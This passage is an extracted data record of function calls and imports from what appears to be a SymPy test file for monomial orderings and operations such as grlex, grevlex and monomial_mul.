monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1804, 1820), 'sympy.polys.monomialtools.grlex', 'grlex', (['(1, 2, 3)'], {}), '((1, 2, 3))\n', (1809, 1820), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1830, 1846), 
'sympy.polys.monomialtools.grlex', 'grlex', (['(1, 3, 3)'], {}), '((1, 3, 3))\n', (1835, 1846), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1847, 1863), 'sympy.polys.monomialtools.grlex', 'grlex', (['(1, 2, 3)'], {}), '((1, 2, 3))\n', (1852, 1863), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1873, 1889), 'sympy.polys.monomialtools.grlex', 'grlex', (['(1, 2, 4)'], {}), '((1, 2, 4))\n', (1878, 1889), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1890, 1906), 'sympy.polys.monomialtools.grlex', 'grlex', (['(1, 2, 3)'], {}), '((1, 2, 3))\n', (1895, 1906), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1917, 1933), 'sympy.polys.monomialtools.grlex', 'grlex', (['(0, 2, 3)'], {}), '((0, 2, 3))\n', (1922, 1933), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1934, 1950), 'sympy.polys.monomialtools.grlex', 'grlex', (['(1, 2, 3)'], {}), '((1, 2, 3))\n', (1939, 1950), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1960, 1976), 'sympy.polys.monomialtools.grlex', 'grlex', (['(1, 1, 3)'], {}), '((1, 1, 3))\n', (1965, 1976), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1977, 1993), 'sympy.polys.monomialtools.grlex', 'grlex', (['(1, 2, 3)'], {}), '((1, 2, 3))\n', (1982, 1993), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2003, 2019), 'sympy.polys.monomialtools.grlex', 'grlex', (['(1, 2, 2)'], {}), '((1, 2, 2))\n', (2008, 2019), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2020, 2036), 'sympy.polys.monomialtools.grlex', 'grlex', (['(1, 2, 3)'], {}), '((1, 2, 3))\n', (2025, 2036), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, 
monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2047, 2063), 'sympy.polys.monomialtools.grlex', 'grlex', (['(2, 2, 3)'], {}), '((2, 2, 3))\n', (2052, 2063), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2064, 2080), 'sympy.polys.monomialtools.grlex', 'grlex', (['(1, 2, 4)'], {}), '((1, 2, 4))\n', (2069, 2080), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2090, 2106), 'sympy.polys.monomialtools.grlex', 'grlex', (['(1, 3, 3)'], {}), '((1, 3, 3))\n', (2095, 2106), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2107, 2123), 'sympy.polys.monomialtools.grlex', 'grlex', (['(1, 2, 4)'], {}), '((1, 2, 4))\n', (2112, 2123), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2134, 2150), 'sympy.polys.monomialtools.grlex', 'grlex', (['(0, 2, 3)'], {}), '((0, 2, 3))\n', (2139, 2150), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2151, 2167), 'sympy.polys.monomialtools.grlex', 'grlex', (['(1, 2, 2)'], {}), '((1, 2, 2))\n', (2156, 2167), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2177, 2193), 'sympy.polys.monomialtools.grlex', 'grlex', (['(1, 1, 3)'], {}), '((1, 1, 3))\n', (2182, 2193), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2194, 2210), 'sympy.polys.monomialtools.grlex', 'grlex', (['(1, 2, 2)'], {}), '((1, 2, 2))\n', (2199, 2210), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2247, 2265), 'sympy.polys.monomialtools.grevlex', 'grevlex', (['(1, 2, 3)'], {}), '((1, 2, 3))\n', (2254, 2265), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2332, 2350), 'sympy.polys.monomialtools.grevlex', 'grevlex', (['(1, 2, 3)'], {}), '((1, 2, 3))\n', (2339, 2350), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, 
monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2352, 2370), 'sympy.polys.monomialtools.grevlex', 'grevlex', (['(1, 2, 3)'], {}), '((1, 2, 3))\n', (2359, 2370), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2381, 2399), 'sympy.polys.monomialtools.grevlex', 'grevlex', (['(2, 2, 3)'], {}), '((2, 2, 3))\n', (2388, 2399), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2400, 2418), 'sympy.polys.monomialtools.grevlex', 'grevlex', (['(1, 2, 3)'], {}), '((1, 2, 3))\n', (2407, 2418), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2428, 2446), 'sympy.polys.monomialtools.grevlex', 'grevlex', (['(1, 3, 3)'], {}), '((1, 3, 3))\n', (2435, 2446), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2447, 2465), 'sympy.polys.monomialtools.grevlex', 'grevlex', (['(1, 2, 3)'], {}), '((1, 2, 3))\n', (2454, 2465), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2475, 2493), 'sympy.polys.monomialtools.grevlex', 'grevlex', (['(1, 2, 4)'], {}), '((1, 2, 4))\n', (2482, 2493), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2494, 2512), 'sympy.polys.monomialtools.grevlex', 'grevlex', (['(1, 2, 3)'], {}), '((1, 2, 3))\n', (2501, 2512), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2523, 2541), 'sympy.polys.monomialtools.grevlex', 'grevlex', (['(0, 2, 3)'], {}), '((0, 2, 3))\n', (2530, 2541), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2542, 2560), 'sympy.polys.monomialtools.grevlex', 'grevlex', (['(1, 2, 3)'], {}), '((1, 2, 3))\n', (2549, 2560), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2570, 2588), 'sympy.polys.monomialtools.grevlex', 'grevlex', (['(1, 1, 3)'], {}), '((1, 1, 3))\n', (2577, 
2588), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2589, 2607), 'sympy.polys.monomialtools.grevlex', 'grevlex', (['(1, 2, 3)'], {}), '((1, 2, 3))\n', (2596, 2607), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2617, 2635), 'sympy.polys.monomialtools.grevlex', 'grevlex', (['(1, 2, 2)'], {}), '((1, 2, 2))\n', (2624, 2635), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2636, 2654), 'sympy.polys.monomialtools.grevlex', 'grevlex', (['(1, 2, 3)'], {}), '((1, 2, 3))\n', (2643, 2654), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2665, 2683), 'sympy.polys.monomialtools.grevlex', 'grevlex', (['(2, 2, 3)'], {}), '((2, 2, 3))\n', (2672, 2683), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2684, 2702), 'sympy.polys.monomialtools.grevlex', 'grevlex', (['(1, 2, 4)'], {}), '((1, 2, 4))\n', (2691, 2702), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2712, 2730), 'sympy.polys.monomialtools.grevlex', 'grevlex', (['(1, 3, 3)'], {}), '((1, 3, 3))\n', (2719, 2730), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2731, 2749), 'sympy.polys.monomialtools.grevlex', 'grevlex', (['(1, 2, 4)'], {}), '((1, 2, 4))\n', (2738, 2749), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2760, 2778), 'sympy.polys.monomialtools.grevlex', 'grevlex', (['(0, 2, 3)'], {}), '((0, 2, 3))\n', (2767, 2778), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2779, 2797), 'sympy.polys.monomialtools.grevlex', 'grevlex', (['(1, 2, 2)'], {}), '((1, 2, 2))\n', (2786, 2797), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, 
ProductOrder\n'), ((2807, 2825), 'sympy.polys.monomialtools.grevlex', 'grevlex', (['(1, 1, 3)'], {}), '((1, 1, 3))\n', (2814, 2825), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2826, 2844), 'sympy.polys.monomialtools.grevlex', 'grevlex', (['(1, 2, 2)'], {}), '((1, 2, 2))\n', (2833, 2844), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2855, 2873), 'sympy.polys.monomialtools.grevlex', 'grevlex', (['(0, 1, 1)'], {}), '((0, 1, 1))\n', (2862, 2873), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2874, 2892), 'sympy.polys.monomialtools.grevlex', 'grevlex', (['(0, 0, 2)'], {}), '((0, 0, 2))\n', (2881, 2892), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2902, 2920), 'sympy.polys.monomialtools.grevlex', 'grevlex', (['(0, 3, 1)'], {}), '((0, 3, 1))\n', (2909, 2920), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2921, 2939), 'sympy.polys.monomialtools.grevlex', 'grevlex', (['(2, 2, 1)'], {}), '((2, 2, 1))\n', (2928, 2939), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((3422, 3436), 'sympy.polys.monomialtools.monomial_key', 'monomial_key', ([], {}), '()\n', (3434, 3436), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((3456, 3475), 'sympy.polys.monomialtools.monomial_key', 'monomial_key', (['"""lex"""'], {}), "('lex')\n", (3468, 3475), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((3494, 3515), 'sympy.polys.monomialtools.monomial_key', 'monomial_key', (['"""grlex"""'], {}), "('grlex')\n", (3506, 3515), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((3536, 3559), 'sympy.polys.monomialtools.monomial_key', 'monomial_key', (['"""grevlex"""'], {}), "('grevlex')\n", (3548, 3559), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, 
grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((3697, 3731), 'sympy.polys.monomialtools.monomial_mul', 'monomial_mul', (['(3, 4, 1)', '(1, 2, 0)'], {}), '((3, 4, 1), (1, 2, 0))\n', (3709, 3731), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((3776, 3810), 'sympy.polys.monomialtools.monomial_div', 'monomial_div', (['(3, 4, 1)', '(1, 2, 0)'], {}), '((3, 4, 1), (1, 2, 0))\n', (3788, 3810), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((3855, 3889), 'sympy.polys.monomialtools.monomial_gcd', 'monomial_gcd', (['(3, 4, 1)', '(1, 2, 0)'], {}), '((3, 4, 1), (1, 2, 0))\n', (3867, 3889), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((3934, 3968), 'sympy.polys.monomialtools.monomial_lcm', 'monomial_lcm', (['(3, 4, 1)', '(1, 2, 0)'], {}), '((3, 4, 1), (1, 2, 0))\n', (3946, 3968), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((4013, 4058), 'sympy.polys.monomialtools.monomial_max', 'monomial_max', (['(3, 4, 5)', '(0, 5, 1)', '(6, 3, 9)'], {}), '((3, 4, 5), (0, 5, 1), (6, 3, 9))\n', (4025, 4058), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((4101, 4146), 'sympy.polys.monomialtools.monomial_min', 'monomial_min', (['(3, 4, 5)', '(0, 5, 1)', '(6, 3, 9)'], {}), '((3, 4, 5), (0, 5, 1), (6, 3, 9))\n', (4113, 4146), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((4193, 4231), 'sympy.polys.monomialtools.monomial_divides', 'monomial_divides', (['(1, 2, 3)', '(4, 5, 6)'], {}), '((1, 2, 3), (4, 5, 6))\n', (4209, 4231), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((4247, 4285), 'sympy.polys.monomialtools.monomial_divides', 'monomial_divides', (['(1, 2, 3)', '(0, 5, 6)'], {}), '((1, 2, 3), (0, 5, 6))\n', (4263, 4285), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((5052, 5071), 'sympy.polys.monomialtools.Monomial', 'Monomial', (['(4, 6, 1)'], {}), '((4, 6, 1))\n', (5060, 5071), False, 'from 
sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((5090, 5109), 'sympy.polys.monomialtools.Monomial', 'Monomial', (['(2, 2, 1)'], {}), '((2, 2, 1))\n', (5098, 5109), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((5137, 5156), 'sympy.polys.monomialtools.Monomial', 'Monomial', (['(4, 6, 1)'], {}), '((4, 6, 1))\n', (5145, 5156), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((5183, 5202), 'sympy.polys.monomialtools.Monomial', 'Monomial', (['(2, 2, 1)'], {}), '((2, 2, 1))\n', (5191, 5202), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((5227, 5246), 'sympy.polys.monomialtools.Monomial', 'Monomial', (['(1, 2, 0)'], {}), '((1, 2, 0))\n', (5235, 5246), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((5270, 5289), 'sympy.polys.monomialtools.Monomial', 'Monomial', (['(3, 4, 1)'], {}), '((3, 4, 1))\n', (5278, 5289), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((5322, 5341), 'sympy.polys.monomialtools.Monomial', 'Monomial', (['(1, 2, 0)'], {}), '((1, 2, 0))\n', (5330, 5341), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((5373, 5392), 'sympy.polys.monomialtools.Monomial', 'Monomial', (['(3, 4, 1)'], {}), '((3, 4, 1))\n', (5381, 5392), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((5413, 5432), 'sympy.polys.monomialtools.Monomial', 'Monomial', (['(0, 0, 0)'], {}), '((0, 0, 0))\n', (5421, 5432), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((5473, 5492), 'sympy.polys.monomialtools.Monomial', 'Monomial', (['(6, 8, 2)'], {}), '((6, 8, 2))\n', (5481, 5492), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, 
ProductOrder\n'), ((5512, 5532), 'sympy.polys.monomialtools.Monomial', 'Monomial', (['(9, 12, 3)'], {}), '((9, 12, 3))\n', (5520, 5532), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((536, 552), 'sympy.polys.monomialtools.monomials', 'monomials', (['[]', '(0)'], {}), '([], 0)\n', (545, 552), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((579, 595), 'sympy.polys.monomialtools.monomials', 'monomials', (['[]', '(1)'], {}), '([], 1)\n', (588, 595), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((622, 638), 'sympy.polys.monomialtools.monomials', 'monomials', (['[]', '(2)'], {}), '([], 2)\n', (631, 638), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((665, 681), 'sympy.polys.monomialtools.monomials', 'monomials', (['[]', '(3)'], {}), '([], 3)\n', (674, 681), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((709, 726), 'sympy.polys.monomialtools.monomials', 'monomials', (['[x]', '(0)'], {}), '([x], 0)\n', (718, 726), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((753, 770), 'sympy.polys.monomialtools.monomials', 'monomials', (['[x]', '(1)'], {}), '([x], 1)\n', (762, 770), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((800, 817), 'sympy.polys.monomialtools.monomials', 'monomials', (['[x]', '(2)'], {}), '([x], 2)\n', (809, 817), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((853, 870), 'sympy.polys.monomialtools.monomials', 'monomials', (['[x]', '(3)'], {}), '([x], 3)\n', (862, 870), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((913, 933), 'sympy.polys.monomialtools.monomials', 'monomials', (['[x, y]', '(0)'], {}), '([x, y], 0)\n', (922, 933), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, 
